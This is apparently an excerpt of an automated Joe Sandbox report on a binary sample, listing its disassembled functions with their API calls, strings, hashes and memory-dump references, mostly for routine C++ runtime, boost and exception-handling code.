                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Concurrency::critical_section::critical_sectionH_prolog3
                            • String ID: ~/X
                            • API String ID: 221928310-3598876131
                            • Opcode ID: 01dc7ca36c9af132488cd6549aaafe1517b30a06729ffdfcfab98c78d5166254
                            • Instruction ID: 4a58cd136fa69847c5614ee1920342e576b9da8fa92b96101e1748f9aea83a6d
                            • Opcode Fuzzy Hash: 01dc7ca36c9af132488cd6549aaafe1517b30a06729ffdfcfab98c78d5166254
                            • Instruction Fuzzy Hash: E5F03C702121019BEB18FF51C89BA393FB2BF40309F58441DEE06EA641DB74D841DB05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::exception::exception.LIBCMT ref: 0041D7B0
                              • Part of subcall function 0040F323: ___std_exception_copy.LIBVCRUNTIME ref: 0040F341
                            • __ExceptionPtrCopy.LIBCPMT ref: 0041D7C7
                              • Part of subcall function 00582D26: _Reset.LIBCPMT ref: 00582D3A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CopyExceptionReset___std_exception_copystd::exception::exception
                            • String ID: )@A
                            • API String ID: 3160724110-964663934
                            • Opcode ID: ceda06db20240489a6e48e70e704e601f8805f04c5b151a16a6aede31ed5b633
                            • Instruction ID: 8f391f37537dd4bc763ec2c55056d101bb4af1d0d2a25f2f44feb554a4e6689d
                            • Opcode Fuzzy Hash: ceda06db20240489a6e48e70e704e601f8805f04c5b151a16a6aede31ed5b633
                            • Instruction Fuzzy Hash: 13F01D72515649ABC714DF49D802BAAFBACEB45730F10422FE82193A80DBB969008B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 00582579
                            • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 005825C1
                              • Part of subcall function 005826A0: EncodePointer.KERNEL32(?,?,?,00000001,?,005825C6,?), ref: 00582750
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception$EncodeH_prolog3PointerPtr::__
                            • String ID: m+X
                            • API String ID: 4003105897-2895029710
                            • Opcode ID: 9392fe750c38a4d8bfbc62396106ad4d130a47cbc6f6cb885b36cf1f9f01c99e
                            • Instruction ID: f12b37a3ac4dd88ebc41c038999ec7c113d9cd0f1659cfeced54df5a5d6e3699
                            • Opcode Fuzzy Hash: 9392fe750c38a4d8bfbc62396106ad4d130a47cbc6f6cb885b36cf1f9f01c99e
                            • Instruction Fuzzy Hash: 9EF09071A407459FDB10EF998841B9EFFF5BF84714F10442EF554AB291CBB09A048BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004265FC
                              • Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8
                              • Part of subcall function 0040F3FA: ___std_exception_destroy.LIBVCRUNTIME ref: 0040F424
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeallocateH_prolog___std_exception_destroystd::_
                            • String ID: "gB$dB
                            • API String ID: 517235596-1691998663
                            • Opcode ID: bb3e06b57799232816ccef2c5fdaa742e73ea8f9bd7c36b58c4c54553227e9a0
                            • Instruction ID: 4f396e299dbe407b87e936b6af92340d2bd918b4bac787491b714b9d5a8935da
                            • Opcode Fuzzy Hash: bb3e06b57799232816ccef2c5fdaa742e73ea8f9bd7c36b58c4c54553227e9a0
                            • Instruction Fuzzy Hash: D3F0CD71900244AAC724EF598801BAEBBF8EF81730F20425EE166A31C2CBB82A018755
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • TlsAlloc.KERNEL32 ref: 00410770
                            • GetLastError.KERNEL32 ref: 0041077F
                              • Part of subcall function 0041037A: __EH_prolog.LIBCMT ref: 0041037F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocErrorH_prologLast
                            • String ID: tss
                            • API String ID: 249634027-1638339373
                            • Opcode ID: 37c532ff2c1216f657573317fc955fae18d32346f171784d35b4c882b7803e8d
                            • Instruction ID: 7767345e25553655080e048a62f20e34ffe8b35e099c56ff0bf57211427a5901
                            • Opcode Fuzzy Hash: 37c532ff2c1216f657573317fc955fae18d32346f171784d35b4c882b7803e8d
                            • Instruction Fuzzy Hash: 92E02B30F00218ABC71077B968C409EBBE9DAC8234710427BE81597392DAB8498B4B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,0069C82B), ref: 006AB750
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileSystem
                            • String ID: 0A$GetSystemTimePreciseAsFileTime
                            • API String ID: 2086374402-4002876861
                            • Opcode ID: c7450b068648ba0887448b02ff3065442876bb8c914277648ff6f67ea5d52877
                            • Instruction ID: 6d70eb9f46a9a64f14569db712dbd6e4f01f7c13f313c566dfc3d22a430fdfe1
                            • Opcode Fuzzy Hash: c7450b068648ba0887448b02ff3065442876bb8c914277648ff6f67ea5d52877
                            • Instruction Fuzzy Hash: 9FE0E571B41318A79710BF649D06D7EBB93DB49B11B404169F8096B281DFB08E109BCA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041280F
                              • Part of subcall function 0041267E: __EH_prolog.LIBCMT ref: 00412683
                              • Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog
                            • String ID: 6A$06A
                            • API String ID: 3519838083-223357171
                            • Opcode ID: 7b6c715e5130c8721710a9e487e975662c75c4ea1790463ee8de8202fc14d362
                            • Instruction ID: eca12a43316dbb3a31cd2df608725b8f5681017cfb1e8438f01c40cfb5baac28
                            • Opcode Fuzzy Hash: 7b6c715e5130c8721710a9e487e975662c75c4ea1790463ee8de8202fc14d362
                            • Instruction Fuzzy Hash: 1AF06DB1401209EBC704EF99D6056EDFFB6FF52354F10425EE1149B691CBB55A24CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 005788CE
                              • Part of subcall function 00579730: __EH_prolog.LIBCMT ref: 00579735
                            • _strlen.LIBCMT ref: 005788F0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$_strlen
                            • String ID: Portable image format (*.pbm;*.pgm;*.ppm;*.pxm;*.pnm)
                            • API String ID: 1490583215-1029613475
                            • Opcode ID: 7f59cfd11c5b1878f04be798f3854440fd099ba751878aa7759f6258b1149d7f
                            • Instruction ID: 80bb32cce355ac01261c6b69d11c3c2255739fbf66f3e5c7b8534e45542ca4f9
                            • Opcode Fuzzy Hash: 7f59cfd11c5b1878f04be798f3854440fd099ba751878aa7759f6258b1149d7f
                            • Instruction Fuzzy Hash: 6BF0A0729106449ADB24AF58D9067AEBBFCEF91721F10066FF42593692CBB42D0096A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00578E57
                              • Part of subcall function 00579730: __EH_prolog.LIBCMT ref: 00579735
                            • _strlen.LIBCMT ref: 00578E79
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$_strlen
                            • String ID: TIFF Files (*.tiff;*.tif)
                            • API String ID: 1490583215-969518115
                            • Opcode ID: 8df1b13dad2ce4141dbfeeef4821556b308b2975ae9338baf09e7e9635f98005
                            • Instruction ID: a0667cf50f8be4ec036636b3a3dd9cc6271612a5837f91897a9604bb1794b09c
                            • Opcode Fuzzy Hash: 8df1b13dad2ce4141dbfeeef4821556b308b2975ae9338baf09e7e9635f98005
                            • Instruction Fuzzy Hash: 83F020729205449AD724AF5CD8067AEFBBCEF91720F10026FF011A3682C7B42D0092A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 0058252D
                            • __ExceptionPtr::__ExceptionPtr.LIBCMT ref: 00582563
                              • Part of subcall function 005826A0: EncodePointer.KERNEL32(?,?,?,00000001,?,005825C6,?), ref: 00582750
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: Exception$EncodeH_prolog3PointerPtr::__
                            • String ID: m+X
                            • API String ID: 4003105897-2895029710
                            • Opcode ID: 913da3cebc69cc95631334cc77f5ad99483d006c37bc7e4efa03e1888d330ccb
                            • Instruction ID: 8df42ccd2d3fdfc9fd85804b76f056dd488c732d34ba028371c2f0bb644040cc
                            • Opcode Fuzzy Hash: 913da3cebc69cc95631334cc77f5ad99483d006c37bc7e4efa03e1888d330ccb
                            • Instruction Fuzzy Hash: BCF08570A112169FCB50EFA8C0006AEBFF1BF09300F10846EB899EB201DB709A04CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00410C82
                            • CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 00410C94
                              • Part of subcall function 00410B2A: __EH_prolog.LIBCMT ref: 00410B2F
                              • Part of subcall function 004123F5: __CxxThrowException@8.LIBVCRUNTIME ref: 0041240F
                            Strings
                            • boost::thread_resource_error, xrefs: 00410C9E
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$CreateEventException@8Throw
                            • String ID: boost::thread_resource_error
                            • API String ID: 198059956-52533987
                            • Opcode ID: 1a164ffb7d7992499a21f89b34fc0440501e870148e75efce5f3466bc3cc7b47
                            • Instruction ID: 49e4c0660a23dcb75cd5f3498cc31a18c8345470ec49bbbe7571606633aa47d7
                            • Opcode Fuzzy Hash: 1a164ffb7d7992499a21f89b34fc0440501e870148e75efce5f3466bc3cc7b47
                            • Instruction Fuzzy Hash: BFF0A0B198420CEBDB10EFE0DD05BDE7B71FB14705F004159F904AA280DBB94A84DB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0040F608: InitializeCriticalSectionEx.KERNEL32(0079E760,00000000,00000000,0079E74C,00596BF3,?,?,?,0040F21C), ref: 0040F60E
                              • Part of subcall function 0040F608: GetLastError.KERNEL32(?,?,?,0040F21C), ref: 0040F618
                            • IsDebuggerPresent.KERNEL32(?,?,?,0040F21C), ref: 00596BF7
                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040F21C), ref: 00596C06
                            Strings
                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00596C01
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                            • API String ID: 3511171328-631824599
                            • Opcode ID: 88da9bc2f899907a1d6627ffafd0da83b39259829df6f6793debda9842619c1e
                            • Instruction ID: d4c036fcae37f4084c567cba2579976e98d4a324b05579e4f57c4f6623958f28
                            • Opcode Fuzzy Hash: 88da9bc2f899907a1d6627ffafd0da83b39259829df6f6793debda9842619c1e
                            • Instruction Fuzzy Hash: 16E06D702017818FDB709F25E5087827FE5AB14349F01892DF885D7651EBB5D988CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 00412374
                              • Part of subcall function 00412559: __EH_prolog.LIBCMT ref: 0041255E
                              • Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004123C2
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrow
                            • String ID: 86A
                            • API String ID: 1193697898-1576963401
                            • Opcode ID: f6fefb93a8016f4d5820b687e0725b4b40c18e82d00a83300a8d939c596b7758
                            • Instruction ID: 0b62c954ae02e6c1c718dab4881d14592e3510e7da179f93061bc6e4a504c101
                            • Opcode Fuzzy Hash: f6fefb93a8016f4d5820b687e0725b4b40c18e82d00a83300a8d939c596b7758
                            • Instruction Fuzzy Hash: 91F01CB180528CEADB04EBE5C64E6CCBFB5AB10318F204168D0517B186C7B90B88C75A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041CA4D
                              • Part of subcall function 0041D8B4: std::exception::exception.LIBCMT ref: 0041D8D6
                              • Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CA9B
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrowstd::exception::exception
                            • String ID: bA
                            • API String ID: 1371192639-897489536
                            • Opcode ID: 2716bbbf81c842bf1b27c6300b8ecd3f3c6e2e1163b5b2925c245b324a45f4df
                            • Instruction ID: 1702613bc4d7873dff79c591d96cd102a775604c8e5d15698f88d781f926d443
                            • Opcode Fuzzy Hash: 2716bbbf81c842bf1b27c6300b8ecd3f3c6e2e1163b5b2925c245b324a45f4df
                            • Instruction Fuzzy Hash: 00F01CB1C1425CEADF04FBA9D94AADCBBB4AF14318F14426CE06176192C7B91648CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041CAFF
                              • Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CB4D
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrow
                            • String ID: JA
                            • API String ID: 1193697898-3301965381
                            • Opcode ID: 8bd85736b7c2cea6e92f45583433b4f34073cc927cf1b11944b1a8d4cd02a7cb
                            • Instruction ID: 5228f20f21dc8152200ef69f30287661c6e84751c9a023f01c5366d53ad0930e
                            • Opcode Fuzzy Hash: 8bd85736b7c2cea6e92f45583433b4f34073cc927cf1b11944b1a8d4cd02a7cb
                            • Instruction Fuzzy Hash: 5EF0F8B2C1825CEBDF04EBA5C94A6DDBFB5AB14308F108268E05176182CBB90648CB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041CC5B
                              • Part of subcall function 0040F569: std::exception::exception.LIBCMT ref: 0040F58B
                              • Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CCA9
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrowstd::exception::exception
                            • String ID: KA
                            • API String ID: 1371192639-4189050869
                            • Opcode ID: 4c1ea2af7b9039861cb6726c3c3c17fcbc05b0211f7b0f8da518d32bef9fb658
                            • Instruction ID: 48157b314adcb158eb4ecfb938529cea034f0d970046aa0e08d466c5143675d8
                            • Opcode Fuzzy Hash: 4c1ea2af7b9039861cb6726c3c3c17fcbc05b0211f7b0f8da518d32bef9fb658
                            • Instruction Fuzzy Hash: 0FF0F8B1C1425CEADF14EFA5D94AACCBAB0AB14308F14426DE06176193C7B94648CB29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041CD0D
                              • Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CD5B
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrow
                            • String ID: 3A
                            • API String ID: 1193697898-806190331
                            • Opcode ID: 752e4bddf0348bb06a045d0cc595b55efbe3f8ae2b409c3dea51c142d1a9049a
                            • Instruction ID: afcf0afa1086773f7d4efeaeebe32466338ed74be56a30067d14ed461a87e8a8
                            • Opcode Fuzzy Hash: 752e4bddf0348bb06a045d0cc595b55efbe3f8ae2b409c3dea51c142d1a9049a
                            • Instruction Fuzzy Hash: 0DF01CB1C1420CEBDF04EBA5DD4A6CCBEB5BF14318F10426CE06176192D7B9464CCB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 0041D64D
                              • Part of subcall function 004103BF: __EH_prolog.LIBCMT ref: 004103C4
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0041D69B
                              • Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog$ExceptionException@8RaiseThrow
                            • String ID: RA
                            • API String ID: 1193697898-2489262598
                            • Opcode ID: ed25e96609f27017d1fbef0252baa919f2359df7f3a56548066db5bc896ddfdd
                            • Instruction ID: f7f83b3d672e2e3ea372a55306b04b1c76932bacc795154e1acbce626890db18
                            • Opcode Fuzzy Hash: ed25e96609f27017d1fbef0252baa919f2359df7f3a56548066db5bc896ddfdd
                            • Instruction Fuzzy Hash: 31F01CB1C1425CEBDF04FFA5C94AADCBEB4AB24318F14426CE4517B192C7B90A48CB29
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog.LIBCMT ref: 004260D6
                            • std::exception::exception.LIBCONCRT ref: 004260E7
                              • Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313
                            Strings
                            • call to empty boost::function, xrefs: 004260DF
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prolog___std_exception_copystd::exception::exception
                            • String ID: call to empty boost::function
                            • API String ID: 238416039-3939084148
                            • Opcode ID: b07cba072a029add528fb8cbd24f0446675fe96943eb8b5c453dc6219cff55b2
                            • Instruction ID: 31dc3c1c376e461c466c09fd2016a5224f36de06e2c6f883abf66d0ff9b0a87f
                            • Opcode Fuzzy Hash: b07cba072a029add528fb8cbd24f0446675fe96943eb8b5c453dc6219cff55b2
                            • Instruction Fuzzy Hash: A9E0DFB0D51219EBE7249F88C8063DDBBF9EB04320F1002AEE490A32C2C3F91B018BC4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040A2EB
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: f2691ee7c58ee39118237f8b00f540ccf792c6c4174974a2a792e13a2f547b09
                            • Instruction ID: ddb6bf3122922fbe502811115ade512f7d7a5d7aa7b7724a637a58d77962b036
                            • Opcode Fuzzy Hash: f2691ee7c58ee39118237f8b00f540ccf792c6c4174974a2a792e13a2f547b09
                            • Instruction Fuzzy Hash: 0AC04C5299A5202D39493255380BDEE424F8D96320F16117FF540656D25D892D8155FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 004022B2
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: 26c978780c75564582692b50e13a396d5c810437428a86158ead1fa56979b9f5
                            • Instruction ID: 5077432d5b53f128c306b847c1f12a9bec3d7b103ef96dfda9e75c436612fc35
                            • Opcode Fuzzy Hash: 26c978780c75564582692b50e13a396d5c810437428a86158ead1fa56979b9f5
                            • Instruction Fuzzy Hash: 7FC04C22A9A62029394972653C07DEA025E8D56720B16147FF940E55D25C992D8142FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 0040873A
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: c8407f097d4b4996ff136f2c3ea385626dd877c3f54e7aaafc1c7f43f63b1551
                            • Instruction ID: 077a2de6e530767f8f8a5263a5e530a8d9f8b299f56ac8d3a85c5ecfd48a5b9a
                            • Opcode Fuzzy Hash: c8407f097d4b4996ff136f2c3ea385626dd877c3f54e7aaafc1c7f43f63b1551
                            • Instruction Fuzzy Hash: 67C04C2259A6306D3D4933A5794BDEA024E8D57324B16107FF541A55D25C893C8151FE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • _strlen.LIBCMT ref: 00404982
                              • Part of subcall function 0068A19C: __onexit.LIBCMT ref: 0068A1A2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.555783700.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.557640561.00000000007A9000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_mzQcZawXvh.jbxd
                            Yara matches
                            Similarity
                            • API ID: __onexit_strlen
                            • String ID: 1.38$1.38
                            • API String ID: 4000879885-3497077264
                            • Opcode ID: b2d2211aa2eb173cf53635da8df5da82761455f1f9a3c894d05d18441a8e798b
                            • Instruction ID: ce8c6b9130df83ab8c0afd1af596a027e8b0888e437793a1298583a6eb38ad6b
                            • Opcode Fuzzy Hash: b2d2211aa2eb173cf53635da8df5da82761455f1f9a3c894d05d18441a8e798b
